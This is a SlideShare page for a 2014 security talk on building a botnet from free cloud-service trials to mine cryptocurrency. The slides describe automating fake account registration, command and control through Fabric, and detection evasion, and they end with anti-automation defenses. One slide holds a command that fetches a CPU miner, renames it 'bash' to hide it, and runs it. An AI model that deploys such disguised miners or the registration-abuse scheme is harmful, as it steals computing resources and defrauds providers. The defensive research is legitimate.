SlideShare a Scribd company logo

CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

Rob Ragan
Rob Ragan

What happens when computer criminals start using friendly cloud services for malicious activities? In this presentation, we explore how to (ab)use free trials to get access to vast amounts of computing power, storage, and pre-made hacking environments. Oh! Also, we violate the hell out of some terms of service. We explore just how easy it is to generate massive amounts of unique email addresses; in order to register free trial accounts, deploy code, and distribute commands (C2). We managed to build this cloud-based botnet all for the low cost of $0 and semi-legally. This botnet doesn't get flagged as malware, blocked by web filters, or get taken over. This is the stuff of nightmares! While riding on the fluffy Kumobot (kumo means cloud in Japanese), it was discovered that we were not the only ones doing this! With the rise of crypto currency we now face the impending rise of botnets that mine for digital gold on someone else's systems with someone else's dime footing the electric bill. Through our efforts in building a cloud-based botnet we built enough tools to share a framework for penetration testers and security researchers. The anti-anti-automation framework will show those tasked with defense exactly what it looks like when their free trial gets assaulted.

Technology
1 of 47
Download to read offline
CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
2 …and Violating Terms of Service Building a Botnet with Free Cloud-based Services
3 Main Topics •  Could we build a botnet from freely available cloud services? •  Will we see the rise of more cloud based botnets? •  Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
4 Platform as a Service Cloud PaaS
5 Platform as a Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/AZ4nYp
6 Development Environment as a Service Free Cloud Services
AUTOMATION Scripting the Cloud
8 Automating Registration •  Hurdles -  Email address confirmation -  CAPTCHA -  Phone/SMS -  Credit Card Usability vs Security Cloud Providers (In)Security
9 Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
10 Anti-Automation Techniques •  Email address confirmation •  CAPTCHA •  Phone/SMS •  Credit Card Usability vs Security Cloud Providers (In)Security
11
12 Automated email processing -  Wildcard localpart *@domain.com -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
local-part@domain.tld Email Address Anatomy
14 Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
15 Unlimited usernames -  Prevent pattern recognition -  Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
16 Unlimited domains -  freedns.afraid.org -  Prevent detection -  Thousands of unique email domains SMTP Services Plethora of Email Addresses
17 Unlimited email addresses Free DNS Subdomains
18 What do we need? •  Free email relay -  Free MX registration •  Process wildcards -  *@domain.tld •  Send unlimited messages -  Unrestricted STMP to HTTP POST/ JSON requests Free Signups Receiving Email and Processing
19 Inbound Mail As A Service Free Cloud Services <Insert  with  other  providers  later>   Reference: http://goo.gl/yqoh6U
20 Automated email processing -  Extract important information from incoming emails -  Grep for confirmation token links and request them Account registration -  Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
21 <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
DEMONSTRATION Automatic Account Creation
23 Automated Registration Workflow Email Addresses
24 MongoDB •  MongoLab •  MongoHQ Keeping track of all accounts Storing Account Information
FUNTIVITIES Botnets Are Fun!
26 What can we do? •  Distributed Network Scanning •  Distributed Password Cracking •  DDoS •  Click-fraud •  Crypto Currency Mining •  Data Storage Now we have a botnet! Fun! Botnet Activities
27 Refer Fake Friends Unlimited Storage Space
28 Refer Fake Friends Unlimited Storage Space
29 What are we using? •  Fabric -  Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. •  fab check_hosts –P –z 20 •  fab run_command Botnet C2 Command & Control
30 Unique Amazon IP Addresses Distributed Command [na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13 [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254 [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128 [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72 [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19 [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
31 Make money, money •  Deploying miners •  One command for $$$ All your processors are belong to us Litecoin Mining if [ ! -f bash ]; then wget http://sourceforge.net/projects/ cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler- cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash –url=stratum+tcp://pool.mine-litecoin.com -- userpass=ninja.47:47; rm bash
32 Load After Crypto Currency Mining Distributed Command ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
33 All your processors are belong to us Litecoin Mining
CLOUD BREAKOUT Bypassing Restrictions
DETECTION No one can catch a ninja!
36 Automatic Backups •  Propagate to other similar services -  e.g. MongoLab ß à MongoHQ •  Infrastructure across multiple service providers •  Easily migrated Armadillo Up ™ Disaster Recovery Plan
RISING TREAD Active Attacks
38 Adaptation Cloud Provider Registration
39 Adaptation Cloud Provider Registration
40 Adaptation Cloud Provider Registration
41 Crypto Coins & DDoS Clouds Under Siege
42 Crypto Coins & DDoS Clouds Under Siege
PROTECTION Bot Busters
44 What can we do? •  Logic puzzles •  Sound output •  Credit card validation •  Live operators •  Limited-use account •  Heuristic checks •  Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
45 What should we do? •  Analyzing properties of Sybil accounts •  Analyzing the arrival rate and distribution of accounts •  Flag accounts registered with emails from newly registered domain names •  Email verification •  CAPTCHAs •  IP Blacklisting •  Phone/SMS verification •  Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
46 At Abuse vs At Registration Protection Advanced techniques •  Signup flow events -  Detect common activities after signup •  User-agent -  A registration bot may generate a different user-agent for each signup or use uncommon user-agents •  Form submission timing -  A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM

Recommended

Module-1-Digital-and-Analog-Quantities-PROF (1).pdf
Module-1-Digital-and-Analog-Quantities-PROF (1).pdfModule-1-Digital-and-Analog-Quantities-PROF (1).pdf
Module-1-Digital-and-Analog-Quantities-PROF (1).pdfAnthonyTayong1
 
Input & Output
Input & OutputInput & Output
Input & OutputDilum Bandara
 
Arm cortex (lpc 2148) based motor speed
Arm cortex (lpc 2148) based motor speedArm cortex (lpc 2148) based motor speed
Arm cortex (lpc 2148) based motor speedUday Wankar
 
subroutines and interrupts
subroutines and interruptssubroutines and interrupts
subroutines and interruptsManoj Chowdary
 
Semiconductor Memories
Semiconductor MemoriesSemiconductor Memories
Semiconductor Memoriesmelisha monteiro
 
Crazy incentives and how they drive security into no man's land
Crazy incentives and how they drive security into no man's landCrazy incentives and how they drive security into no man's land
Crazy incentives and how they drive security into no man's landChristian Folini
 
Microprocessor and Microcontroller Lab Manual!
Microprocessor and Microcontroller Lab Manual!Microprocessor and Microcontroller Lab Manual!
Microprocessor and Microcontroller Lab Manual!PRABHAHARAN429
 
Microcontrollers 80 Marks Sample Question Paper
Microcontrollers 80 Marks Sample Question PaperMicrocontrollers 80 Marks Sample Question Paper
Microcontrollers 80 Marks Sample Question Paperprathik
 

Recommended

Module-1-Digital-and-Analog-Quantities-PROF (1).pdf
Module-1-Digital-and-Analog-Quantities-PROF (1).pdfModule-1-Digital-and-Analog-Quantities-PROF (1).pdf
Module-1-Digital-and-Analog-Quantities-PROF (1).pdfAnthonyTayong1
 
Input & Output
Input & OutputInput & Output
Input & OutputDilum Bandara
 
Arm cortex (lpc 2148) based motor speed
Arm cortex (lpc 2148) based motor speedArm cortex (lpc 2148) based motor speed
Arm cortex (lpc 2148) based motor speedUday Wankar
 
subroutines and interrupts
subroutines and interruptssubroutines and interrupts
subroutines and interruptsManoj Chowdary
 
Semiconductor Memories
Semiconductor MemoriesSemiconductor Memories
Semiconductor Memoriesmelisha monteiro
 
Crazy incentives and how they drive security into no man's land
Crazy incentives and how they drive security into no man's landCrazy incentives and how they drive security into no man's land
Crazy incentives and how they drive security into no man's landChristian Folini
 
Microprocessor and Microcontroller Lab Manual!
Microprocessor and Microcontroller Lab Manual!Microprocessor and Microcontroller Lab Manual!
Microprocessor and Microcontroller Lab Manual!PRABHAHARAN429
 
Microcontrollers 80 Marks Sample Question Paper
Microcontrollers 80 Marks Sample Question PaperMicrocontrollers 80 Marks Sample Question Paper
Microcontrollers 80 Marks Sample Question Paperprathik
 
General Purpose Registers.pptx
General Purpose Registers.pptxGeneral Purpose Registers.pptx
General Purpose Registers.pptxVedantGhumade
 
Descarga Parcial de Cables - Conferencia Virtual
Descarga Parcial de Cables - Conferencia VirtualDescarga Parcial de Cables - Conferencia Virtual
Descarga Parcial de Cables - Conferencia VirtualTRANSEQUIPOS S.A.
 
Instruction formats-in-8086
Instruction formats-in-8086Instruction formats-in-8086
Instruction formats-in-8086MNM Jain Engineering College
 
Code Converters & Parity Checker
Code Converters & Parity CheckerCode Converters & Parity Checker
Code Converters & Parity Checker.AIR UNIVERSITY ISLAMABAD
 
Allenbradley Control Logix PLC Network Architecture
Allenbradley Control Logix PLC Network ArchitectureAllenbradley Control Logix PLC Network Architecture
Allenbradley Control Logix PLC Network ArchitectureDEEPAK GORAI
 
Encoder & Decoder
Encoder & DecoderEncoder & Decoder
Encoder & DecoderSyed Saeed
 
Xcs 234 microprocessors
Xcs 234 microprocessorsXcs 234 microprocessors
Xcs 234 microprocessorssweta suman
 
Bcd to 7 segment display
Bcd to 7 segment displayBcd to 7 segment display
Bcd to 7 segment displayMaulik Sanchela
 
PPT On Scada And Dcs.ppt
PPT On Scada And Dcs.pptPPT On Scada And Dcs.ppt
PPT On Scada And Dcs.pptSahilAhmad39
 
Chapter 4 flip flop for students
Chapter 4 flip flop for studentsChapter 4 flip flop for students
Chapter 4 flip flop for studentsCT Sabariah Salihin
 
Adder substracter
Adder substracterAdder substracter
Adder substracterWanNurdiana
 
"BCD TO 7 SEGMENT DISPLAY DECODER"
"BCD TO 7 SEGMENT DISPLAY DECODER""BCD TO 7 SEGMENT DISPLAY DECODER"
"BCD TO 7 SEGMENT DISPLAY DECODER"FAIZAN SHAFI
 
Cache Memory
Cache MemoryCache Memory
Cache MemorySubid Biswas
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansSocial Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansRob Ragan
 
Tenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingTenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingRob Ragan
 
Black money
Black moneyBlack money
Black moneyVedant Vaid
 
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Rob Ragan
 
Bitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The CommunityBitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The CommunityEarthsite
 
Blockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack LabsBlockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack LabsWithTheBest
 
Demonetisation
DemonetisationDemonetisation
DemonetisationKannan R
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 

More Related Content

What's hot

General Purpose Registers.pptx
General Purpose Registers.pptxGeneral Purpose Registers.pptx
General Purpose Registers.pptxVedantGhumade
 
Descarga Parcial de Cables - Conferencia Virtual
Descarga Parcial de Cables - Conferencia VirtualDescarga Parcial de Cables - Conferencia Virtual
Descarga Parcial de Cables - Conferencia VirtualTRANSEQUIPOS S.A.
 
Allenbradley Control Logix PLC Network Architecture
Allenbradley Control Logix PLC Network ArchitectureAllenbradley Control Logix PLC Network Architecture
Allenbradley Control Logix PLC Network ArchitectureDEEPAK GORAI
 
Encoder & Decoder
Encoder & DecoderEncoder & Decoder
Encoder & DecoderSyed Saeed
 
Xcs 234 microprocessors
Xcs 234 microprocessorsXcs 234 microprocessors
Xcs 234 microprocessorssweta suman
 
Bcd to 7 segment display
Bcd to 7 segment displayBcd to 7 segment display
Bcd to 7 segment displayMaulik Sanchela
 
PPT On Scada And Dcs.ppt
PPT On Scada And Dcs.pptPPT On Scada And Dcs.ppt
PPT On Scada And Dcs.pptSahilAhmad39
 
Chapter 4 flip flop for students
Chapter 4 flip flop for studentsChapter 4 flip flop for students
Chapter 4 flip flop for studentsCT Sabariah Salihin
 
Adder substracter
Adder substracterAdder substracter
Adder substracterWanNurdiana
 
"BCD TO 7 SEGMENT DISPLAY DECODER"
"BCD TO 7 SEGMENT DISPLAY DECODER""BCD TO 7 SEGMENT DISPLAY DECODER"
"BCD TO 7 SEGMENT DISPLAY DECODER"FAIZAN SHAFI
 

What's hot (13)

General Purpose Registers.pptx
General Purpose Registers.pptxGeneral Purpose Registers.pptx
General Purpose Registers.pptx
 
Descarga Parcial de Cables - Conferencia Virtual
Descarga Parcial de Cables - Conferencia VirtualDescarga Parcial de Cables - Conferencia Virtual
Descarga Parcial de Cables - Conferencia Virtual
 
Instruction formats-in-8086
Instruction formats-in-8086Instruction formats-in-8086
Instruction formats-in-8086
 
Code Converters & Parity Checker
Code Converters & Parity CheckerCode Converters & Parity Checker
Code Converters & Parity Checker
 
Allenbradley Control Logix PLC Network Architecture
Allenbradley Control Logix PLC Network ArchitectureAllenbradley Control Logix PLC Network Architecture
Allenbradley Control Logix PLC Network Architecture
 
Encoder & Decoder
Encoder & DecoderEncoder & Decoder
Encoder & Decoder
 
Xcs 234 microprocessors
Xcs 234 microprocessorsXcs 234 microprocessors
Xcs 234 microprocessors
 
Bcd to 7 segment display
Bcd to 7 segment displayBcd to 7 segment display
Bcd to 7 segment display
 
PPT On Scada And Dcs.ppt
PPT On Scada And Dcs.pptPPT On Scada And Dcs.ppt
PPT On Scada And Dcs.ppt
 
Chapter 4 flip flop for students
Chapter 4 flip flop for studentsChapter 4 flip flop for students
Chapter 4 flip flop for students
 
Adder substracter
Adder substracterAdder substracter
Adder substracter
 
"BCD TO 7 SEGMENT DISPLAY DECODER"
"BCD TO 7 SEGMENT DISPLAY DECODER""BCD TO 7 SEGMENT DISPLAY DECODER"
"BCD TO 7 SEGMENT DISPLAY DECODER"
 
Cache Memory
Cache MemoryCache Memory
Cache Memory
 

Viewers also liked

Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansSocial Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansRob Ragan
 
Tenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingTenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingRob Ragan
 
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Rob Ragan
 
Bitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The CommunityBitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The CommunityEarthsite
 
Blockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack LabsBlockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack LabsWithTheBest
 
Demonetisation
DemonetisationDemonetisation
DemonetisationKannan R
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskRob Ragan
 
21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks Revealed21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks RevealedEmma Brudner
 
Train The Trainer Power Point Presentation
Train The Trainer Power Point PresentationTrain The Trainer Power Point Presentation
Train The Trainer Power Point Presentationpreethi_madhan
 

Viewers also liked (15)

Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Social Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response PlansSocial Engineering: the Bad, Better, and Best Incident Response Plans
Social Engineering: the Bad, Better, and Best Incident Response Plans
 
Tenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of BingTenacious Diggity - Skinny Dippin in a Sea of Bing
Tenacious Diggity - Skinny Dippin in a Sea of Bing
 
Black money
Black moneyBlack money
Black money
 
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
Black Hat 2011 - Pulp Google Hacking: The Next Generation Search Engine Hacki...
 
Bitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The CommunityBitcoin 101: The Currency, The Network, The Community
Bitcoin 101: The Currency, The Network, The Community
 
Blockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack LabsBlockchains 101 - Muneeb Ali, Blockstack Labs
Blockchains 101 - Muneeb Ali, Blockstack Labs
 
Demonetisation
DemonetisationDemonetisation
Demonetisation
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Demonetization Myths Debunked
Demonetization Myths DebunkedDemonetization Myths Debunked
Demonetization Myths Debunked
 
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering RiskBSidesPGH - Never Surrender - Reducing Social Engineering Risk
BSidesPGH - Never Surrender - Reducing Social Engineering Risk
 
Corruption
CorruptionCorruption
Corruption
 
Demonetisation.
Demonetisation.Demonetisation.
Demonetisation.
 
21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks Revealed21 Hidden LinkedIn Hacks Revealed
21 Hidden LinkedIn Hacks Revealed
 
Train The Trainer Power Point Presentation
Train The Trainer Power Point PresentationTrain The Trainer Power Point Presentation
Train The Trainer Power Point Presentation
 

Similar to CloudBots - Harvesting Crypto Currency Like a Botnet Farmer

Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet FarmerBlack Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet FarmerBishop Fox
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud preventionRakuten Group, Inc.
 
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys MeetupsVPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys MeetupsAngel Alberici
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsSBWebinars
 
Meetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpcMeetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpcGonzalo Marcos Ansoain
 
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIsBoundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIsSidney Burks, Ph.D
 
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발 [Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발 Yunho Maeng
 
Achieving scalability & speed with IaaS
Achieving scalability & speed with IaaSAchieving scalability & speed with IaaS
Achieving scalability & speed with IaaSIBM Software India
 
Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloudLennartF
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud preventionYury Leonychev
 
IoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and BlockchainIoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and BlockchainValerie Lampkin
 
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...WithTheBest
 
From Zero to Serverless
From Zero to ServerlessFrom Zero to Serverless
From Zero to ServerlessChad Green
 
IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018Chris Phillips
 
Will Microservices Die.pdf
Will Microservices Die.pdfWill Microservices Die.pdf
Will Microservices Die.pdfRichHagarty
 
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203Arnaud Le Hors
 
Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security Bahtiyar Bircan
 
Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)Matt Lucas
 
Blockchain for Business
Blockchain for BusinessBlockchain for Business
Blockchain for BusinessAhmad Gohar
 
Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)Benjamin Fuentes
 

Similar to CloudBots - Harvesting Crypto Currency Like a Botnet Farmer (20)

Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet FarmerBlack Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
 
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys MeetupsVPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
VPCs, Metrics Framework, Back pressure : MuleSoft Virtual Muleys Meetups
 
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud ThreatsBeyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
Beyond S3 Buckets - Effective Countermeasures for Emerging Cloud Threats
 
Meetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpcMeetup milano #3 all you need to know before creating your vpc
Meetup milano #3 all you need to know before creating your vpc
 
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIsBoundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
Boundless Digital - Boost IT Network Capabilities thanks to Cisco APIs
 
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발 [Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
[Call for code] IBM 블록체인을 활용하여 투명하게 구호기금 관리하기 - Hyperledger Fabric v1.1 by 맹개발
 
Achieving scalability & speed with IaaS
Achieving scalability & speed with IaaSAchieving scalability & speed with IaaS
Achieving scalability & speed with IaaS
 
Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud Getting started with bc 2.0 in the cloud
Getting started with bc 2.0 in the cloud
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
 
IoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and BlockchainIoT with the Best: Watson IoT Bluemix and Blockchain
IoT with the Best: Watson IoT Bluemix and Blockchain
 
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
IBM's Watson IoT Platform Allows You to Quickly Connect Devices to Bluemix Cl...
 
From Zero to Serverless
From Zero to ServerlessFrom Zero to Serverless
From Zero to Serverless
 
IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018IBM API Connect Deployment `Good Practices - IBM Think 2018
IBM API Connect Deployment `Good Practices - IBM Think 2018
 
Will Microservices Die.pdf
Will Microservices Die.pdfWill Microservices Die.pdf
Will Microservices Die.pdf
 
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
Hyperledger Fabric - Blockchain for the Enterprise - FOSDEM 20190203
 
Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security Cloud Computing v.s. Cyber Security
Cloud Computing v.s. Cyber Security
 
Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)Using IBM Blockchain Platform (November 2019)
Using IBM Blockchain Platform (November 2019)
 
Blockchain for Business
Blockchain for BusinessBlockchain for Business
Blockchain for Business
 
Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)Blockchain with HyperLedger (Public version)
Blockchain with HyperLedger (Public version)
 

More from Rob Ragan

Nbt hacker fight
Nbt hacker fightNbt hacker fight
Nbt hacker fightRob Ragan
 
Expose Yourself Without Insecurity: Cloud Breach Patterns
Expose Yourself Without Insecurity: Cloud Breach PatternsExpose Yourself Without Insecurity: Cloud Breach Patterns
